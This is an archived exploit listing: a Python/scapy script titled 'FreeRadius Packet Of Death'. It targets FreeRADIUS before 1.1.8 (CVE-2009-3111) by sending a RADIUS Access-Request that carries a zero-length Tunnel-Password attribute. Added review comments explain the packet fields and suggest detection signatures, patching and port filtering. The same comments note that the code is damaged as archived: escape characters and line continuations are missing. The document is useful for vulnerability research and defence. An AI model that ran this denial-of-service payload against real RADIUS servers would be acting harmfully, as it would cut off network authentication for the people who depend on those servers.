# Title : FreeRadius < 1.1.8 Zero-length Tunnel-Password DoS Exploit (CVE-2009-3111)
# Published : 2009-09-11
# Author : Matthew Gillespie
#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py
# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/
import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr
# NOTE(review): as archived, this listing does not parse as Python (extraction
# damage). The comments below describe only what the visible fields show, so the
# traffic can be recognised and the affected servers patched.
#
# Argument check: exactly one command-line argument (the RADIUS server host) is
# expected; otherwise a usage line is printed and the script exits with status 1.
if len(sys.argv) != 2:
print "Usage: radius_killer.py <radiushost>n"
sys.exit(1)
# One UDP datagram to port 1812 (RADIUS authentication), built from scapy layers:
#   - Radius(code=1, ...) is an Access-Request with id=180 and a constant
#     authenticator; no shared secret is used anywhere in the visible code.
#   - RadiusAttr(type=69, value="", len=2) is a Tunnel-Password attribute
#     (RFC 2868) whose length covers only the type/length header, i.e. it
#     carries no value at all.
# Per the page title, FreeRADIUS versions before 1.1.8 are affected by this
# zero-length Tunnel-Password attribute (CVE-2009-3111); the remediation implied
# by that version bound is upgrading to 1.1.8 or later.
# Detection: RFC 2868 defines Tunnel-Password for Access-Accept only, so an
# Access-Request carrying attribute 69 -- and in particular one with attribute
# length 2 -- is anomalous and a reasonable IDS/packet-filter signature.
# Limiting UDP/1812 to known NAS addresses narrows exposure; whether the
# vulnerable parsing happens before the server's client check is not shown
# here -- TODO confirm against the advisory.
PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/
Radius(code=1,authenticator="x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99x99",id=180)/
RadiusAttr(type=69,value="",len=2)
# Emits the single packet; nothing is read back, so the script itself does not
# verify any effect on the server.
send(PoD)